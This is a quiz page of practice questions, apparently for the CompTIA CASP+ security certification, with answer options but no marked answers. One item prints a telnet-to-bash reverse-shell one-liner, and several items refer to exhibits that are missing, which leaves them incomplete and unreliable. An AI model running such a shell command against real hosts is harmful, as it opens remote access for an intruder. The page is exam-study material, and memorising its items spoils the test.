option
Questions
ayuda
daypo
search.php

ERASED TEST, YOU MAY BE INTERESTED ON Casp+ C

COMMENTS STATISTICS RECORDS
TAKE THE TEST
Title of test:
Casp+ C

Description:
CompTIA CASP+

Author:
TheShed
Other tests from this author

Creation Date: 18/09/2024

Category: Computers

Number of questions: 88
Share the Test:
New CommentNuevo Comentario
No comments about this test.
Content:
A security analyst sees that a hacker has discovered some keys and they are being made available on a public website. The security analyst is then able to successfully decrypt that data using the keys from the website. Which of the following should the security analyst recommend to protect the affected data? Key rotation Key revocation Key escrow Zeroization Cryptographic obfuscation.
A company would like to obfuscate PII data accessed by an application that is housed in a database to prevent unauthorized viewing. Which of the following should the company do to accomplish this goal? Use cell-level encryption. Mask the data Implement a DLP solution. Utilize encryption at rest.
A security engineer needs to implement a CASB to secure employee user web traffic. A key requirement is that the relevant event data must be collected from existing on-premises infrastructure components and consumed by the CASB to expand traffic visibility. The solution must be highly resilient to network outages. Which of the following architectural components would BEST meet these requirements? Log collection Reverse proxy A WAF API mode.
A company security engineer arrives at work to face the following scenario: 1. Website defacement 2. Calls from the company president indicating the website needs to be fixed immediately because it is damaging the brand 3. A job offer from the company's competitor 4. A security analyst's investigative report, based on logs from the past six months, describing how lateral movement across the network from various IP addresses originating from a foreign adversary country resulted in exfiltrated data Which of the following threat actors is MOST likely involved? Organized crime Script kiddie APT/nation-state Competitor.
A company wants to improve its active protection capabilities against unknown and zero-day malware. Which of the following is the MOST secure solution? NIDS Application allow list Sandbox detonation Endpoint log collection HIDS.
Which of the following BEST describe the importance of maintaining chain of custody in forensic evidence collection? (Choose two.) It increases the likelihood that evidence will be deemed admissible in court. It authenticates personnel who come in contact with evidence after collection. It ensures confidentiality and the need-to-know basis of forensically acquired evidence It attests to how recently evidence was collected by recording date/time attributes. t provides automated attestation for the integrity of the collected evidence. It ensures the integrity of the collected evidence.
A company just released a new video card. Due to limited supply and high demand, attackers are employing automated systems to purchase the device through the company's web store so they can resell it on the secondary market. The company's intended customers are frustrated. A security engineer suggests implementing a CAPTCHA system on the web store to help reduce the number of video cards purchased through automated systems. Which of the following now describes the level of risk? Inherent Low Mitigated Residual Transferred.
A vulnerability assessment endpoint generated a report of the latest findings. A security analyst needs to review the report and create a priority list of items that must be addressed. Which of the following should the analyst use to create the list quickly? Business impact rating CVE dates CVSS scores OVAL.
An organization collects personal data from its global customers. The organization determines how that data is going to be used, why it is going to be used, and how it is manipulated for business processes. Which of the following will the organization need in order to comply with GDPR? (Choose two.) Data processor Data custodian Data owner Data steward Data controller Data manager.
The Chief Executive Officer (CEO) of a small wholesaler with low margins is concerned about the use of a newly developed artificial intelligence algorithm being used in the organization's marketing tool. The tool can make automated purchasing approval decisions based on data provided by customers and collected from the Internet. Which of the following is MOST likely the concern? (Choose two.) Required computing power Cost to maintain Customer privacy Adversarial attacks Information bias Customer approval speed.
A company's finance department acquired a new payment system that exports data to an unencrypted file on the system. The company implemented controls on the file so only appropriate personnel are allowed access. Which of the following risk techniques did the department use in this situation? Accept Avoid Transfer Mitigate.
A security architect is given the following requirements to secure a rapidly changing enterprise with an increasingly distributed and remote workforce: ✑ Cloud-delivered services ✑ Full network security stack ✑ SaaS application security management ✑ Minimal latency for an optimal user experience ✑ Integration with the cloud IAM platform Which of the following is the BEST solution? Routing and Remote Access Service (RRAS) NGFW Managed Security Service Provider (MSSP) SASE.
A user experiences an HTTPS connection error when trying to access an Internet banking website from a corporate laptop. The user then opens a browser on a mobile phone and is able to access the same Internet banking website without issue. Which of the following security configurations is MOST likely the cause of the error? HSTS TLS 1.2 Certificate pinning Client authentication.
An organization recently recovered from an attack that featured an adversary injecting malicious logic into OS bootloaders on endpoint devices. Therefore, the organization decided to require the use of TPM for measured boot and attestation, monitoring each component from the UEFI through the full loading of OS components. Which of the following TPM structures enables this storage functionality? Endorsement tickets Clock/counter structures Command tag structures with MAC schemes Platform configuration registers.
A developer wants to develop a secure, external-facing web application. The developer is looking for an online community that produces tools, methodologies, articles, and documentation in the field of web-application security. Which of the following is the BEST option? ICANN PCI DSS OWASP CSA NIST.
An administrator at a software development company would like to protect the integrity of the company's applications with digital signatures. The developers report that the signing process keeps failing on all applications. The same key pair used for signing, however, is working properly on the website, is valid, and is issued by a trusted CA. Which of the following is MOST likely the cause of the signature failing? The NTP server is set incorrectly for the developers. The CA has included the certificate in its CRL. The certificate is set for the wrong key usage. Each application is missing a SAN or wildcard entry on the certificate.
A company created an external, PHP-based web application for its customers. A security researcher reports that the application has the Heartbleed vulnerability. Which of the following would BEST resolve and mitigate the issue? (Choose two.) Deploying a WAF signature Fixing the PHP code Changing the web server from HTTPS to HTTP Using SSLv3 Changing the code from PHP to ColdFusion Updating the OpenSSL library.
A security engineer is reviewing a record of events after a recent data breach incident that involved the following: ✑ A hacker conducted reconnaissance and developed a footprint of the company's Internet-facing web application assets. ✑ A vulnerability in a third-party library was exploited by the hacker, resulting in the compromise of a local account. ✑ The hacker took advantage of the account's excessive privileges to access a data store and exfiltrate the data without detection. Which of the following is the BEST solution to help prevent this type of attack from being successful in the future? Dynamic analysis Secure web gateway Software composition analysis User behavior analysis Web application firewall.
Due to adverse events, a medium-sized corporation suffered a major operational disruption that caused its servers to crash and experience a major power outage. Which of the following should be created to prevent this type of issue in the future? SLA BIA BCM BCP RTO.
An analyst has prepared several possible solutions to a successful attack on the company. The solutions need to be implemented with the LEAST amount of downtime. Which of the following should the analyst perform? Implement all the solutions at once in a virtual lab and then run the attack simulation. Collect the metrics and then choose the best solution based on the metrics. Implement every solution one at a time in a virtual lab, running a metric collection each time. After the collection, run the attack simulation, roll back each solution, and then implement the next. Choose the best solution based on the best metrics Implement every solution one at a time in a virtual lab, running an attack simulation each time while collecting metrics. Roll back each solution and then implement the next. Choose the best solution based on the best metrics Implement all the solutions at once in a virtual lab and then collect the metrics. After collection, run the attack simulation. Choose the best solution based on the best metrics.
An investigator is attempting to determine if recent data breaches may be due to issues with a company's web server that offers news subscription services. The investigator has gathered the following data: • Clients successfully establish TLS connections to web services provided by the server. • After establishing the connections, most client connections are renegotiated. • The renegotiated sessions use cipher suite TLS_RSA_WITH_NULL_SHA. Which of the following is the MOST likely root cause? The clients disallow the use of modem cipher suites The web server is misconfigured to support HTTP/1.1 A ransomware payload dropper has been installed. An entity is performing downgrade attacks on path.
A security analyst discovered that a database administrator's workstation was compromised by malware. After examining the logs, the compromised workstation was observed connecting to multiple databases through ODBC. The following query behavior was captured: Assuming this query was used to acquire and exfiltrate data, which of the following types of data was compromised, and what steps should the incident response plan contain? Personal health information; Inform the human resources department of the breach and review the DLP logs Account history; Inform the relationship managers of the breach and create new accounts for the affected users Customer IDs; Inform the customer service department of the breach and work to change the account numbers. PAN; Inform the legal department of the breach and look for this data in dark web monitoring.
The Chief Information Officer (CIO) wants to implement enterprise mobility throughout the organization. The goal is to allow employees access to company resources. However, the CIO wants the ability to enforce configuration settings, manage data, and manage both company-owned and personal devices. Which of the following should the CIO implement to achieve this goal? BYOD CYOD COPE MDM.
Which of the following is MOST commonly found in a network SLA contract? Price for extra services Performance metrics Service provider responsibility only Limitation of liability Confidentiality and non-disclosure.
A security operations center analyst is investigating anomalous activity between a database server and an unknown external IP address and gathered the following data: • dbadmin last logged in at 7:30 a.m. and logged out at 8:05 a.m. • A persistent TCP/6667 connection to the external address was established at 7:55 a.m. The connection is still active. • Other than bytes transferred to keep the connection alive, only a few kilobytes of data transfer every hour since the start of the connection. • A sample outbound request payload from PCAP showed the ASCII content: "JOIN #community". Which of the following is the MOST likely root cause? A SQL injection was used to exfiltrate data from the database server The system has been hijacked for cryptocurrency mining. A botnet Trojan is installed on the database server The dbadmin user is consulting the community for help via Internet Relay Chat.
Which of the following describes the system responsible for storing private encryption/decryption files with a third party to ensure these files are stored safely? Key escrow TPM Trust models Code signing.
A security administrator has been tasked with hardening a domain controller against lateral movement attacks. Below is an output of running services: Which of the following configuration changes must be made to complete this task? Stop the Print Spooler service and set the startup type to disabled. Stop the DNS Server service and set the startup type to disabled. Stop the Active Directory Web Services service and set the startup type to disabled Stop Credential Manager service and leave the startup type to disabled.
In comparison to other types of alternative processing sites that may be invoked as a part of disaster recovery, cold sites are different because they: have basic utility coverage, including power and water. provide workstations and read-only domain controllers are generally the least costly to sustain. are the quickest way to restore business. are geographically separated from the company's primary facilities.
An enterprise is undergoing an audit to review change management activities when promoting code to production. The audit reveals the following: • Some developers can directly publish code to the production environment. • Static code reviews are performed adequately. • Vulnerability scanning occurs on a regularly scheduled basis per policy. Which of the following should be noted as a recommendation within the audit report? Implement short maintenance windows. Perform periodic account reviews. Implement job rotation. Improve separation of duties.
A security researcher has been given an executable that was captured by a honeypot. Which of the following should the security researcher implement to test the executable? OSINT SAST DAST OWASP.
An executive has decided to move a company's customer-facing application to the cloud after experiencing a lengthy power outage at a locally managed service provider's data center. The executive would like a solution that can be implemented as soon as possible. Which of the following will BEST prevent similar issues when the service is running in the cloud? (Choose two.) Placing the application instances in different availability zones Restoring the snapshot and starting the new application instance from a different zone Enabling autoscaling based on application instance usage Having several application instances running in different VPCs Using the combination of block storage and multiple CDNs in each application instance Setting up application instances in multiple regions.
A hospitality company experienced a data breach that included customer PII. The hacker used social engineering to convince an employee to grant a third-party application access to some company documents within a cloud file storage service Which of the following is the BEST solution to help prevent this type of attack in the future? NGFW for web traffic inspection and activity monitoring CSPM for application configuration control Targeted employee training and awareness exercises CASB for OAuth application permission control.
A product manager at a new company needs to ensure the development team produces high-quality code on time. The manager has decided to implement an agile development approach instead of waterfall. Which of the following are reasons to choose an agile development approach? (Choose two.) The product manager gives the developers more autonomy to write quality code prior to deployment. An agile approach incorporates greater application security in the development process than a waterfall approach does. The scope of work is expected to evolve during the lifetime of project development The product manager prefers to have code iteratively tested throughout development The product manager would like to produce code in linear phases. Budgeting and creating a timeline for the entire project is often more straightforward using an agile approach rather than waterfall.
An auditor needs to scan documents at rest for sensitive text. These documents contain both text and images. Which of the following software functionalities must be enabled in the DLP solution for the auditor to be able to fully read these documents? (Choose two.) Document interpolation Regular expression pattern matching Optical character recognition functionality Baseline image matching Advanced rasterization Watermarking.
A security analyst is performing a review of a web application. During testing as a standard user, the following error log appears: Which of the following BEST describes the analyst's findings and a potential mitigation technique? The findings indicate unsecure references. All potential user input needs to be properly sanitized. The findings indicate unsecure protocols All cookies should be marked as HttpOnly. The findings indicate information disclosure. The displayed error message should be modified The findings indicate a SQL injection. The database needs to be upgraded.
A local university that has a global footprint is undertaking a complete overhaul of its website and associated systems Some of the requirements are: • Handle an increase in customer demand of resources • Provide quick and easy access to information • Provide high-quality streaming media • Create a user-friendly interface Which of the following actions should be taken FIRST? Deploy high-availability web servers. Enhance network access controls. Implement a content delivery network. Migrate to a virtualized environment.
In order to save money, a company has moved its data to the cloud with a low-cost provider. The company did not perform a security review prior to the move; however, the company requires all of its data to be stored within the country where the headquarters is located. A new employee on the security team has been asked to evaluate the current provider against the most important requirements. The current cloud provider that the company is using offers: • Only multitenant cloud hosting • Minimal physical security • Few access controls • No access to the data center The following information has been uncovered: • The company is located in a known floodplain. which flooded last year. • Government regulations require data to be stored within the country. Which of the following should be addressed FIRST? Update the disaster recovery plan to account for natural disasters. Establish a new memorandum of understanding with the cloud provider Establish a new service-level agreement with the cloud provider Provision services according to the appropriate legal requirements.
A security administrator needs to implement an X.509 solution for multiple sites within the human resources department. This solution would need to secure all subdomains associated with the domain name of the main human resources web server. Which of the following would need to be implemented to properly secure the sites and provide easier private key management? Certificate revocation list Digital signature Wildcard certificate Registration authority Certificate pinning.
An organization’s threat team is creating a model based on a number of incidents in which systems in an air-gapped location are compromised. Physical access to the location and logical access to the systems are limited to administrators and select, approved, on-site company employees. Which of the following is the BEST strategy to reduce the risks of data exposure? NDAs Mandatory access control NIPS Security awareness training.
An organization is establishing a new software assurance program to vet applications before they are introduced into the production environment. Unfortunately, many of the applications are provided only as compiled binaries. Which of the following should the organization use to analyze these applications? (Choose two.) Regression testing SAST Third-party dependency management IDE SAST Fuzz testing IAST.
Which of the following agreements includes no penalties and can be signed by two entities that are working together toward the same goal? MOU NDA SLA ISA.
Which of the following BEST describes a common use case for homomorphic encryption? Processing data on a server after decrypting in order to prevent unauthorized access in transit Maintaining the confidentiality of data both at rest and in transit to and from a CSP for processing Transmitting confidential data to a CSP for processing on a large number of resources without revealing information Storing proprietary data across multiple nodes in a private cloud to prevent access by unauthenticated users.
A security analyst runs a vulnerability scan on a network administrator's workstation. The network administrator has direct administrative access to the company’s SSO web portal. The vulnerability scan uncovers critical vulnerabilities with equally high CVSS scores for the user's browser, OS, email client, and an offline password manager. Which of the following should the security analyst patch FIRST? Email client Password manager Browser OS.
An organization is moving its intellectual property data from on premises to a CSP and wants to secure the data from theft. Which of the following can be used to mitigate this risk? An additional layer of encryption A third-party, data integrity monitoring solution A complete backup that is created before moving the data Additional application firewall rules specific to the migration.
A software developer is working on a piece of code required by a new software package. The code should use a protocol to verify the validity of a remote identity. Which of the following should the developer implement in the code? RSA OCSP HSTS CRL.
Users are reporting intermittent access issues with a new cloud application that was recently added to the network. Upon investigation, the security administrator notices the human resources department is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application. Which of the following MOST likely needs to be done to avoid this in the future? Modify the ACLs. Review the Active Directory Update the marketing department's browser Reconfigure the WAF.
A server in a manufacturing environment is running an end-of-life operating system. The vulnerability management team is recommending that the server be upgraded to a supported operating system, but the ICS software running on the server is not compatible with modem operating systems. Which of the following compensating controls should be implemented to BEST protect the server? Application low list Antivirus HIPS Host-based firewall.
A firewall administrator needs to ensure all traffic across the company network is inspected. The administrator gathers data and finds the following information regarding the typical traffic in the network: Which of the following is the BEST solution to ensure the administrator can complete the assigned task? A full-tunnel VPN Web content filtering An endpoint DLP solution SSL/TLS decryption.
A city government's IT director was notified by the city council that the following cybersecurity requirements must be met to be awarded a large federal grant: • Logs for all critical devices must be retained for 365 days to enable monitoring and threat hunting. • All privileged user access must be tightly controlled and tracked to mitigate compromised accounts. • Ransomware threats and zero-day vulnerabilities must be quickly identified. Which of the following technologies would BEST satisfy these requirements? (Choose three.) Endpoint protection Log aggregator Zero trust network access PAM Cloud sandbox SIEM NGFW.
Company A acquired Company B. During an initial assessment, the companies discover they are using the same SSO system. To help users with the transition. Company A is requiring the following: • Before the merger is complete, users from both companies should use a single set of usernames and passwords. • Users in the same departments should have the same set of rights and privileges, but they should have different sets of rights and privileges if they have different IPs. • Users from Company B should be able to access Company A's available resources. Which of the following are the BEST solutions? (Choose two.) Installing new Group Policy Object policies Establishing one-way trust from Company B to Company A Enabling SAML Implementing attribute-based access control Installing Company A’s Kerberos systems in Company B's network Updating login scripts.
Prior to a risk assessment inspection, the Chief Information Officer tasked the systems administrator with analyzing and reporting any configuration issues on the information systems, and then verifying existing security settings. Which of the following would be BEST to use? SCAP CVSS XCCDF CMDB.
An organization is looking to establish more robust security measures by implementing PKI. Which of the following should the security analyst implement when considering mutual authentication? Perfect forward secrecy on both endpoints Shared secret for both endpoints Public keys on both endpoints A common public key on each endpoint A common private key on each endpoint.
An organization's senior security architect would like to develop cyberdefensive strategies based on standardized adversary techniques, tactics, and procedures commonly observed. Which of the following would BEST support this objective? OSINT analysis The Diamond Model of Intrusion Analysis MITRE ATT&CK Deepfake generation Closed-source intelligence reporting.
A developer wants to maintain integrity to each module of a program and ensure controls are in place to detect unauthorized code modification. Which of the following would be BEST for the developer to perform? (Choose two.) Utilize code signing by a trusted third party Implement certificate-based authentication. Verify MD5 hashes Compress the program with a password Encrypt with 3DES. Make the DACL read-only.
A security solution uses a sandbox environment to execute zero-day software and collect indicators of compromise. Which of the following should the organization do to BEST take advantage of this solution? Develop an Nmap plug-in to detect the indicator of compromise Update the organization's group policy Include the signature in the vulnerability scanning tool Deliver an updated threat signature throughout the EDR system.
A company wants to implement a new website that will be accessible via browsers with no mobile applications available. The new website will allow customers to submit sensitive medical information securely and receive online medical advice. The company already has multiple other websites where it provides various public health data and information. The new website must implement the following: • The highest form of web identity validation • Encryption of all web transactions • The strongest encryption in-transit • Logical separation based on data sensitivity Other things that should be considered include: • The company operates multiple other websites that use encryption. • The company wants to minimize total expenditure. • The company wants to minimize complexity. Which of the following should the company implement on its new website? (Choose two.) Wildcard certificate EV certificate Mutual authentication Certificate pinning SSO HSTS.
Which of the following is used to assess compliance with internal and external requirements? RACI matrix Audit report After-action report Business continuity plan.
A network administrator for a completely air-gapped and closed system has noticed that anomalous external files have been uploaded to one of the critical servers. The administrator has reviewed logs in the SIEM that were collected from security appliances, network infrastructure devices, and endpoints. Which of the following processes, if executed, would be MOST likely to expose an attacker? Reviewing video from IP cameras within the facility Reconfiguring the SIEM connectors to collect data from the perimeter network hosts Implementing integrity checks on endpoint computing devices Looking for privileged credential reuse on the network.
A security engineer is implementing a server-side TLS configuration that provides forward secrecy and authenticated encryption with associated data. Which of the following algorithms, when combined into a cipher suite, will meet these requirements? (Choose three.) EDE CBC GCM AES RSA RC4 ECDSA DH.
A security architect is advising the application team to implement the following controls in the application before it is released: • Least privilege • Blocklist input validation for the following characters: \<>;, ="#+ Based on the requirements, which of the following attacks is the security architect trying to prevent? XLM injection LDAP injection CSRF XSS.
A company wants to use a process to embed a sign of ownership covertly inside a proprietary document without adding any identifying attributes. Which of the following would be BEST to use as part of the process to support copyright protections of the document? Steganography E-signature Watermarking Cryptography.
An organization is assessing the security posture of a new SaaS CRM system that handles sensitive PII and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards. Post remediation work, the assessment recorded the following: 1. There will be a $20.000 per day revenue loss for each day the system is delayed going into production. 2. The inherent risk was high. 3. The residual risk is now low. 4. The solution rollout to the contact center will be a staged deployment. Which of the following risk-handling techniques will BEST meet the organization’s requirements post remediation? Apply for a security exemption, as the risk is too high to accept Transfer the risk to the SaaS CRM vendor, as the organization is using a cloud service. Accept the risk, as compensating controls have been implemented to manage the risk. Avoid the risk by accepting the shared responsibility model with the SaaS CRM provider.
A security analyst is using data provided from a recent penetration test to calculate CVSS scores to prioritize remediation. Which of the following metric groups would the analyst need to determine to get the overall scores? (Choose three.) Temporal Availability Integrity Confidentiality Base Environmental Impact Attack vector.
During a recent security incident investigation, a security analyst mistakenly turned off the infected machine prior to consulting with a forensic analyst. Upon rebooting the machine, a malicious script that was running as a background process was no longer present. As a result, potentially useful evidence was lost. Which of the following should the security analyst have followed? Order of volatility Chain of custody Verification Secure storage.
A global organization's Chief Information Security Officer (CISO) has been asked to analyze the risks involved in a plan to move the organization's current MPLS-based WAN network to use commodity internet and SD-WAN hardware. The SD-WAN provider is currently highly regarded but is a regional provider. Which of the following is MOST likely identified as a potential risk by the CISO? The SD-WAN provider would not be able to handle the organization's bandwidth requirements. The operating costs of the MPLS network are too high for the organization. The SD-WAN provider may not be able to support the required troubleshooting and maintenance Internal IT staff will not be able to properly support remote offices after the migration.
A company has received threat intelligence about bad routes being advertised. The company has also been receiving reports of degraded internet activity. When looking at the routing table on the edge router, a security engineer discovers the following: Which of the following can the company implement to prevent receiving bad routes from peers, while still allowing dynamic updates? OSPF prefix list BGP prefix list EIGRP prefix list DNS.
A company has moved its sensitive workloads to the cloud and needs to ensure high availability and resiliency of its web-based application. The cloud architecture team was given the following requirements: • The application must run at 70% capacity at all times • The application must sustain DoS and DDoS attacks. • Services must recover automatically. Which of the following should the cloud architecture team implement? (Choose three.) Read-only replicas BCP Autoscaling WAF CDN Encryption Continous snapshots Containerization.
A security architect is implementing a web application that uses a database back end. Prior to production, the architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in place to prevent these attacks. Which of the following sources could the architect consult to address this security concern? SDLC OVAL IEEE OWASP.
A security architect is working with a new customer to find a vulnerability assessment solution that meets the following requirements: • Fast scanning • The least false positives possible • Signature-based • A low impact on servers when performing a scan In addition, the customer has several screened subnets, VLANs, and branch offices. Which of the following will BEST meet the customer's needs? Authenticated scanning Passive scanning Unauthenticated scanning Agent-based scanning.
Real-time, safety-critical systems MOST often use serial busses that: have non-deterministic behavior and are not deployed with encryption. have non-deterministic behavior and are deployed with encryption. have deterministic behavior and are deployed with encryption. have deterministic behavior and are not deployed with encryption.
A company wants to securely manage the APIs that were developed for its in-house applications. Previous penetration tests revealed that developers were embedding unencrypted passwords in the code. Which of the following can the company do to address this finding? (Choose two.) Implement complex, key-length API key management Implement user session logging. Implement time-based API key management Use SOAP instead of restful services. Incorporate a DAST into the DevSecOps process to identify the exposure of secrets. Enforce MFA on the developers’ workstations and production systems.
When a remote employee traveled overseas, the employee’s laptop and several mobile devices with proprietary tools were stolen. The security team requires technical controls be in place to ensure no electronic data is compromised or changed. Which of the following BEST meets this requirement? Mobile device management with remote wipe capabilities Passwordless smart card authorization with biometrics Next-generation endpoint detection and response agent Full disk encryption with centralized key management.
A penetration tester inputs the following command: telnet 192.168.99.254 343 ! /bin/bash | telnet 192.168.99.254 344 This command will allow the penetration tester to establish a: port mirror. network pivot. reverse shell. proxy chain.
Which of the following is the MOST important cloud-specific risk from the CSP’s viewpoint? CI/CD deployment failure Management plane breach Insecure data deletion Resource exhaustion.
A security engineer is reviewing a record of events after a recent data breach incident that involved the following: • A hacker conducted reconnaissance and developed a footprint of the company’s Internet-facing web application assets. • A vulnerability in a third-party library was exploited by the hacker, resulting in the compromise of a local account. • The hacker took advantage of the account’s excessive privileges to access a data store and exfiltrate the data without detection. Which of the following is the BEST solution to help prevent this type of attack from being successful in the future? Dynamic analysis Secure web gateway Software composition analysis User behavior analysis Stateful firewall.
A security architect updated the security policy to require a proper way to verify that packets received between two parties have not been tampered with and the connection remains private. Which of the following cryptographic techniques can be used to ensure the security policy is being enforced properly? MD5-based envelope method HMAC_SHA256 PBKDF2 PGP.
A software assurance analyst reviews an SSH daemon’s source code and sees the following: Based on this code snippet, which of the following attacks is MOST likely to succeed? Race condition Cross-site scripting Integer overflow Driver shimming.
A security analyst for a managed service provider wants to implement the most up-to-date and effective security methodologies to provide clients with the best offerings. Which of the following resources would the analyst MOST likely adopt? OSINT ISO MITRE ATT&CK OWASP.
A security manager wants to transition the organization to a zero trust architecture. To meet this requirement, the security manager has instructed administrators to remove trusted zones, role-based access, and one-time authentication. Which of the following will need to be implemented to achieve this objective? (Choose three.) Least privilege VPN Policy automation PKI Firewall Continous validation Continous integration IaaS.
A security architect for a manufacturing company must ensure that a new acquisition of IoT devices is securely integrated into the company’s Infrastructure. The devices should not directly communicate with other endpoints on the network and must be subject to network traffic monitoring to identify anomalous traffic. Which of the following would be the BEST solution to meet these requirements? Block all outbound traffic and implement an inline firewall. Allow only wireless connections and proxy the traffic through a network tap. Establish an air-gapped network and implement an IDS Use a separate VLAN with an ACL and implement network detection and response.
A digital forensics expert has obtained an ARM binary suspected of including malicious behavior. The expert would like to trace and analyze the ARM binary’s execution. Which of the following tools would BEST support this effort? objdump OllyDbg FTK Imager Ghidra.
A software developer was just informed by the security team that the company’s product has several vulnerabilities. Most of these vulnerabilities were traced to code the developer did not write. The developer does not recognize some of the code, as it was in the software before the developer started on the program and is not tracked for licensing purposes. Which of the following would the developer MOST likely do to mitigate the risks and prevent further issues like these from occurring? Perform supply chain analysis and require third-party suppliers to implement vulnerability management programs. Perform software composition analysis and remediate vulnerabilities found in the software. Perform reverse engineering on the code and rewrite the code in a more secure manner Perform fuzz testing and implement DAST in the code repositories to find vulnerabilities prior to deployment.
A significant weather event caused all systems to fail over to the disaster recovery site successfully. However, successful data replication has not occurred in the last six months, which has resulted in the service being unavailable. Which of the following would BEST prevent this scenario form happening again? Performing routine tabletop exercises Implementing scheduled, full interruption tests Backing up system log reviews Performing department disaster recovery walk-throughs.
An organization developed an incident response plan. Which of the following would be BEST to assess the effectiveness of the plan? Requesting a third-party review Generating a checklist by organizational unit Establishing role succession and call lists Creating a playbook Performing a tabletop exercise.
A new mandate by the corporate security team requires that all endpoints must meet a security baseline before accessing the corporate network. All servers and desktop computers are scanned by the dedicated internal scanner appliance installed in each subnet. However, remote worker laptops do not access the network regularly. Which of the following is the BEST option for the security team to ensure remote worker laptops are scanned before being granted access to the corporate network? Implement network access control to perform host validation of installed patches Create an 802.1X implementation with certificate-based device identification. Create a vulnerability scanning subnet for remote workers to connect to on the network at headquarters Install a vulnerability scanning agent on each remote laptop to submit scan data.
A penetration tester is testing a company’s login form for a web application using a list of known usernames and a common password list. According to a brute-force utility, the penetration tester needs to provide the tool with the proper headers, POST URL with variable names, and the error string returned with an improper login. Which of the following would BEST help the tester to gather this information? (Choose two.) The new source feature of the web browser The logs from the web server The inspect feature from the web browser A tcpdump from the web server An HTTP interceptor The website certificate viewed via the web browser.
A security analyst has concerns about malware on an endpoint. The malware is unable to detonate by modifying the kernel response to various system calls. As a test, the analyst modifies a Windows server to respond to system calls as if it was a Linux server. In another test, the analyst modifies the operating system to prevent the malware from identifying target files. Which of the following techniques is the analyst Honeypot Deception Simulators Sandboxing.
Users are claiming that a web server is not accessible. A security engineer is unable to view the Internet Services logs for the site. The engineer connects to the server and runs netstat – an and receives the following output: Which of the following is MOST likely happening to the server? Port scanning ARP spoofing Buffer overflow Denial of service.
Report abuse